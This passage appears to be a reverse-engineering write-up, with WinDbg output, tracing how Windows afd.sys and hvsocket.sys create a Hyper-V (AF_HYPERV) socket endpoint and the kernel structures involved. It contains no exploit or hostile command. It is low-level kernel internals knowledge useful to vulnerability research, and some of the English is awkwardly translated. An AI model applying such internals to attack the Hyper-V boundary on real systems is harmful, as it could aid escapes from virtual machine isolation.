<a href="about:blank" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">\\Device\\Tcp6</span></a></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<a href="about:blank" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">\\Device\\Udp</span></a></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<a href="about:blank" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">\\Device\\Udp6</span></a></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<a href="about:blank" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">\\Device\\RawIp</span></a></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<a href="about:blank" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">\\Device\\RawIp6</span></a></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Any of these devices is not used for AF_HYPERV. Pointer to structure AfdTdiMapping was returned. Further - Afd! AfdAllocateEndpoint from which is caused Afd!AfdTlFindAndReferenceTransport.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000022 (Address Family - AF_HYPERV)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rdx=000000000000001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r8=0000000000000001 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r9=0000000000000001</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In this function there is a work with structure </span><span style="background-color: transparent; color: teal; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AfdTlTransportListHead</span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It contains the linked list of pointers on transports objects. The instruction of mov rbx, [rbx] occurs loading the next element and comparison of family of the addresses AF_HYPERV (0x22) with [rbx+16h] is carried out if coincides, then function returns the address of structure </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dps @rax</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6b8c0 fffff803`db337530 afd!AfdTlTransportListHead</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6b8c8 ffffda85`27dfeca0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6b8d0 00220000`00000006</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6b8d8 00000001`00000001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6b8e0 ffffda85`27f6ba80</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6b8e8 fffff803`db95c000 hvsocket!VmbusTlProviderDispatch</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6b8f0 11d49b1a`eb004a27</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6b8f8 bc597704`50002391</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6b900 ffffda85`27f6b96c</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6b908 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6b910 62524d4e`02080006</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6b918 8ab20db4`3a180386</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dt _GUID @rax+30h – содержит GUID NPI_MS_VMBUS_MODULEID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ServerExample!_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{eb004a27-9b1a-11d4-9123-0050047759bc} </span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Further afd!PplGenericAllocationFunction is caused (allocation of necessary memory, after filling of necessary structures, next nt!NtAllocatePoolEx is caused). Then nt!ObjDerefernceObject is caused, at the same time is loaded the pointer on process (ServerExample.exe) into rcx.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!object @rcx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Object: ffffda8527121080 Type: (ffffda8527096f20) Process</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ObjectHeader: ffffda8527121050 (new version)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HandleCount: 8 PointerCount: 207781</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Further increases on 1 global AfdEndpointsOpened variable. At the time of debugging:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dd afd!AfdEndpointsOpened L4</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db3378e8 000009af 00000000 00000000 00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">There is </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AfdEndpointListHead</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> check whether it is empty</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="34" src="https://lh3.googleusercontent.com/BCWVaK8A1Pe6ql1AfLWMgqC0jxxRS2P4SqPDJ7uTwGp6rgZLE6EMOMR4OGq6YOt3x03JK5R_GZffTHjzSZd5X2oH-KbRjeOI1JZY5jsZF7LkHQB8kXFe3Na7Mv0KTYN7PSPd_PeaOcVjyC7-xA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="206" /></span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then the new element is inserted into this structure</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="72" src="https://lh6.googleusercontent.com/sCeChdsQNG9Y12mQKgS1SkqxGHiLaSrz9Y-2hi2P_ZXnxa1dCl0R75WaG_v7Z5qk0o6MaB6n0wY_Qx8-2efDigxYIwPKbOTEmcOdXVrOQFumE5j_Uknn9Or8YAhP7yU494p-U3HD24k8cgiexg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="152" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AfdEndpointListHead as we saw earlier, contains the created objects of sockets.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In principle, aim of afd!AfdAllocateEndpoint consists in creation of a new _AFD_CONNECTION element (the name of structure is not documented, but in Windows 2003, as far as I know, it was called quite so) and its addition in the </span><span style="background-color: transparent; color: teal; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AfdEndpointListHead </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">array.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then the condition of a socket changes (in type field constant 0xAFD was written)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="51" src="https://lh4.googleusercontent.com/hBHQL5EDurvu8DoZWfApNKfsEIxpB4jf0mG95JkftLcomnSVJ6iQTaDoeJJbDT8fAIS717L7VNsHm142NaG_wD7l8nCZn23DxdsqQhaQILbBil_OR_J4aX1YTsCKKhYkvhUXOOw1RKwJSfibwg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="186" /></span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The constants AFD, AFD1, AFD2, AFD4, AFD8, AAFD, etc. are indicators of a condition of connection. But it looks like no compliance with RFC 793 which describes possible conditions of sockets - LISTEN, SYN-SENT, SYN-RECEIVED, ESTABLISHED, FIN-WAIT-1, FIN-WAIT-2, CLOSE-WAIT, CLOSING, LAST-ACK, TIME-WAIT. Also the byte to the left of a constant changes depending on call type 000</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">1</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd0. For example, after bind call its value will become equal to 3.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc @rdi – pointer to structure _AFD_CONNECTION</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`2943e9e0 0001afd0 00000000 00000100 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`2943e9f0 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`2943ea00 00000000 00000000 27121080 ffffda85 ...........'....</span></div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Further hvsocket!VmbusTlEndpointIsPrivileged is caused, then afd!AfdTLCreateEndpoint.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>r</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx= ffffda852943e9e0 – pointer to _AFD_CONNECTION with which work is performed</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rdx=0000000000000022 – Address Family</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r8=0000000000000001 – Hyper-V RAW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r9=ffffda8527f6b8c0 – pointer to the one of AfdTlTransportListHead elements</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In this function in a stack 50h byte are nullified and then parameters for the function hvsocket!VmbusTlProviderEndpoint are placed </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dps @rsp+20</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9080`26e7b250 fffff803`db362930 afd!AfdTLCreateEndpointComplete</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9080`26e7b258 ffffda85`297201d0 - - IRP</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9080`26e7b260 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9080`26e7b268 00000001`00010022</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9080`26e7b270 ffffda85`2943e9e0 - pointer to _AFD_CONNECTION structure</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9080`26e7b278 ffffda85`27121080 - Process Object (it not really need. In hvsocket if it eq zero driver calls PsGetCurrentProcess) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9080`26e7b280 ffffda85`28714080 - pointer to THREAD structure of ServerExmple.exe process (if it zero later will be called ndis!NdisGetProcessObjectCompartmentId before in rcx load Process struct)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9080`26e7b288 ffffca89`8568e280</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9080`26e7b290 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9080`26e7b298 00000000`00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">then the pointer to hvsocket!VmBusTlProviderEndpoint is loaded into rax, in r14 our IRP:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!irp @r14</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Irp is active with 4 stacks 4 is current (= 0xffffdf08c0c5b408)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">>[IRP_MJ_CREATE(0), N/A(0)]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 0 0 ffffdf08bf161920 ffffdf08c0eb5780 00000000-00000000 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> \Driver\AFD</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Args: ffffa700e57f35d0 03000020 00030000 00000039</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The call of this function is carried out. Checks of the structure transferred to rax are carried out, then for an object of ETHREAD ndis!NdisGetThreadObjectCompartmentId is caused, then vmbus!VmbusTlCreateEndpoint (the 2nd parameter - pointer EPROCESS object), further hvsocket!VmbusTlCreateObjectFromLookasideList in which nt! ExpInterlockedPopEntrySList is caused.</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then hvsocket!VmbusTlInitializeObject (causes nt! KeInitializeEvent and nt!KeInitializeSpinLock). There is a return from hvsocket! VmbusTlCreateObjectFromLookasideList, then the memory block with the size 200h and the Vnpi tag is allocated. Then the memory block is nullified by the size 38h, nt!KeEnterCriticalRegion are caused and nt!ExAcquireFastMutexUnsafe, registration of hvsocket!VmbusTlEndpointActionWorkQueueRoutine is also carried out through netio!NetioInitializeWorkQueue. </span></div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Later there is a return from vmbus!VmbusTlCreateEndpoint, then afd!AfdTLCreateEndpointComplete(PIRP IRP)is caused by, the 4th parameter – pointer to vmbus!VmbusTlProviderEndpointDispatch. Next hvsocket!VmbusTlCreateEndpoint address is written in _AFD_CONNECTION element. Then afd!ObDereferenceSecurityDescriptor is caused, also goes check of successful result - depending on it nt!iofCompleteRequest is carried out or not. Then there is a return from hvsocket.sys to afd.sys.</span></div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The value returned to vmbus! VmBusTlProviderEndpoint - 103h. Therefore AfdTLPendRequest is caused further if it will return not 103h, but is at once afd!AfdCompleteTLEndpCreate call, and only after that there is afd!AfdCompleteTLEndpCreate and nt!IofCompleteRequest. There is a return from afd!AfdCreate (in the rax - same 103h).</span></div>
